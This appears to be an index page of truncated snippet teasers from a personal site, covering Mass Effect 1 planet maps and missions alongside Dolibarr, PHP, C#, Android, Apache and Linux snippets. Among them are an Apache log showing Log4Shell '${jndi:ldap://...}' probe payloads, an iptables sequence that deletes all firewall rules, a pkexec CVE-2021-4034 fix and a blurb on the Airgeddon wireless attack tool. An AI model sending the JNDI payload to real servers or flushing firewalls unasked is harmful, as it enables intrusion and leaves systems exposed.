Objective is to disable a Geth Weather device, which changes the planets atmossphere.<br /> Location: Canalus / Dirada / Pylos Nebula ...
Here you can find a map with all objects and minerals on the planet Mavigon in Mass Effect 1 ...
If you encounter z-Index Problems on safari you can try to put that code into your z-indexed element: -webkit-transform: translate3d(0, 0, 0);<br /> transform: translate3d(0, 0, 0); ...
Here you can find a map with all objects and minerals on the planet Edolus in Mass Effect 1 ...
Here is the Linux code to restart all jitsi services: /etc/init.d/jicofo restart<br /> /etc/init.d/jitsi-videobridge2 restart<br /> /etc/init.d/prosody restart ...
Here you can find a map with all objects and minerals on the planet Antibaar in Mass Effect 1 ...
Objective is to clear the mine from transformed workers.<br /> Location: Aequitas / Fortis / Minos Wasteland<br /> Unfortunately we have no Images available related to this Mission. ...
Here code to check if a string exists in another string! $string = 'This is a String';<br /> if (strpos($string , 'This') !== false) {<br /> echo 'true'; # STRING CONTAINS WORD "This"<br /> } else {<br /> # String not f...
addExtraField ( $attrname,$label, $type, $pos,$size,$elementtype,$unique = 0,$required = 0,$default_value = '',<br role="presentation" />$param = '',$alwayseditable = 0,$perms = '',$list = '-1',$help = '',$computed = '',$entity = '',$langfile = '',$enabl...
If you deleted a module via FTP or etc, and getting error messages about missing files - delete all module constants in llx_const. If the module name was "xxx" the consts would be: MAIN_MODULE_XXX<br />...
// Main menu entries<br role="presentation" />$this->menu = array(); // List of menus to add<br role="presentation" />$r=0;<br role="presentation" />// Add here entries to declare new menus<br role="presentation" />// Example to declare the Top Menu entry:<br role="prese...
// Array to add new pages in new tabs or remove existing one<br role="presentation" />$this->tabs =<br role="presentation" />array('objecttype:+tabname1:Title1:mylangfile@mymodule:$user->rights->mymodule->read:/mymodule<br role="presentation" />/mypagetab1.php?id=__ID_...
FK_STATUT<br role="presentation" />Angebote<br role="presentation" />• 0 - Entwurf nicht bestätigt<br role="presentation" />• 1 - Amngebot ist offen<br />• 2 - unterzeichnet / beauftragt / abrechenbar<br role="presentation" />• 3- Nich...
Here you can see a list of general dolibarr triggers! Trigger code ($action) Type object ($object) USER_CREATE user.class.php USER_MODIFY user.class.php USER_DELETE user.class.php USER_LOGIN user.class.php USER_LOGIN_FAILED user.class.php USER_LOGOUT user.class.php USER_ENABLEDISABLE user.class.php USER_NEW_PASSWORD user.class.php USER_SETINGROUP u...
This notice appears in the readme of almost all Dolibarr Modules.<br role="presentation" />Note: If this screen tell you there is no custom directory, check your setup is correct:<br role="presentation" />- In your Dolibarr installation directory, edit the ``````htdocs/conf/conf.php`````` file and check that<br ro...
GETPOSTISSET() Example:<br role="presentation" />if (GETPOSTISSET('varname')){...}<br role="presentation" />Usage:<br role="presentation" />GETPOSTISSET will check if a $_POST or $_GET Variable with name "varname" is set...
GETPOST Function to get a value out of $_POST or $_GET request.<br role="presentation" />Varname: Is the name of the vaue provided via the request. The value will be stored in<br role="presentation" />$monChamp.<br role="presentation" />INT: Is a checking string. In this case it checks the value of th...
img_picto()<br role="presentation" />Example:<br role="presentation" />img_picto(path,name);<br role="presentation" />Usage:<br role="presentation" />img_picto() will print an image with the path and title provided in the function ...
Objective is to reactivate a mesh and use him to break all walls which are blocking the way to retrieve an ancient artifact.<br /> Location: Taitus / Talava / Caleston rift ...
Enter this in your Websites .htaccess main directory to let the server redirect<br /> HTTP404 Errors or misc to a specified site. ErrorDocument 400 /error/400.php<br /> ErrorDocument 401 /error/401.php<br /> ErrorDocument 403 /error/403.html<br /> ErrorDocument 404 /error/404.php<br /> ErrorDocument 500 /error/405.php ...
$this->rights[$r][0] = 10001;<br role="presentation" />$this->rights[$r][1] = 'Label by default of permission';<br role="presentation" />$this->rights[$r][2] = 'r';<br role="presentation" />$this->rights[$r][3] = 1;<br role="presentation" /&...
* Module SimplePOS is deprecated. If you need a POS module, please use the module TakePOS.<br role="presentation" />* The ICS value for direct debit or credit transfer is now stored on each bank account instead of<br role="presentation" />into the global setup.<br role="presentation" />* API /setup/sh...
Bank and Cash ->banque->lire, ->banque->modifier, ->banque->configurer, ->banque->consolidate, ->banque->export, ->banque->transfer, ->banque->cheque Barcode ->barcode->lire, ->barcode->creer, ->barcode->suppr...
The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...
Here an example to load an custom application xml config file. // Load Configuration<br /> CurrentConfPath = "C:\\PATH\\TO\\EXE.CONFIG";<br /> ExeConfigurationFileMap configMap = new ExeConfigurationFileMap();<br /> configMap.ExeConfigFilename = CurrentConfPath;<br /> Configuration config = ConfigurationMan...
Here is an example to allow software to run only once on a machine.<br /> If the user tries to start the application again, there will ne a notification box and the program will exit. [file] program.cs in visual studio using System;<br /> using System.Threading;<br /> using System.Windows.Forms; namespace myapplicationnamespace<...
<style><br /> .pie {<br /> /* Basic layout */<br /> display: inline-block;<br /> width: 10em;<br /> height: 10em;<br /> border-radius: 50%; ...
deb http://deb.debian.org/debian buster main deb-src http://deb.debian.org/debian buster main deb http://deb.debian.org/debian-security/ buster/updates main deb-src http://deb.debian.org/debian-security/ buster/updates main deb http://deb.debian.org/debian buster-updates main deb-src http://deb.debian.org/debian buster-updates main ...
ModRewrite needs to be enabled in apache2 by executing:<br /> a2enmod rewrite Modify your HTaccess File like this if index.php is your main php File: RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php?i=$1 [L,QSA] For example, if the user enters the UR...
Simple Code to read a File in Android (FROM INTERNAL STORAGE) to a String String readFile(Context context, String filename) throws IOException { String ret = ""; InputStream inStream = context.openFileInput(filename); if ( inStream != null ) { InputStreamReader inputStreamReader = new InputStreamReader(inStream); Buffere...
Example of replacing a sign in a string (works with more than one sign) $newstring = str_replace("TEXT", "NEW TEXT", $initialstring); ...
For an object in space in a perfect circular orbit around another object (should be rare) the equation to calculate velocity of the orbiting object is: Scientifical designations: v = Velocity in m/s<br /> G = Gravitational Constant<br /> r = Radius in Meters<br /> M = Mass of the Central Body in kg Animation of an object orbiting ...
USE WITH OWN RISK - ALL FIREWALL RULES WILL BE DELETED IPv4<br /> <br /> iptables -F<br /> iptables -X<br /> iptables -t nat -F<br /> iptables -t nat -X<br /> iptables -t mangle -F<br /> iptables -t mangle -X<br /> iptables -P INPUT ACCEPT<br /> iptables -P FORWARD ACCEPT<br /> iptables -P...
Airgeddon is a multi use wireless audit tool.<br /> Its possible to pentest WEP and WPA2 Networks. Its included into a security parrot and KALI installation. The main features are Evil Twin Attacks/ Package Capturing and there is a Bruteforce Cracker included with aircrack-ng - but for better performance you should use something like hashcat ...
Here you can find a map with all objects and minerals on the planet Nodacrux in Mass Effect 1 ...
Objective is to disable the Rescue Beacon and fight the malfunctioning LOKI Mechs.<br /> Location: Neith / Amun / Eagle Nebula ...
If SSL Connections fail with Security Protocol Error, this code in Main Function could do the trick! ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls<br /> &a...
Illegal Mercenary Activity on this planet to take care of.<br /> Location: Joab / Enoch / Rosetta Nebula ...
Objective is to repair the magnetic shield, which protects the planet from interstellar radiation.<br /> Location: Sinmara / Solveig / Caleston Rift ...
Objective is to destroy a mercenary base and decrypt a hostile message.<br /> Location: Helyme / Zelene / Crescent Nebula ...
Just a quick setup to render a pdf File. XML Fragment of Image view (somewhere in your layouts xml where you need it) <RelativeLayout<br /> android:id="@+id/relativeLayout"<br /> &a...
This is Example for Internet Permissions Android Manifest XML (for every Permissoin u need one of this fitting block) <!-- Declare Use Of Internet --><br /> <uses-permission android:name="android.permission.INTER...
Here you can find a map with all objects and minerals on the planet Nepmos in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Casbin in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Metgos in Mass Effect 1 ...
This is the Main Layout of a sitemap.xml File <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://w...
Here you can find a map with all objects and minerals on the planet Eletania in Mass Effect 1 ...
[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request...
Here is an example function to get the full html output code of an URL provided to the function into a string.<br /> You can get the data by using a string variable which gets the output: string variable = gethtmlcontent("https://thisisapage"); &...
Here you can find a map with all objects and minerals on the planet Nepheron in Mass Effect 1 ...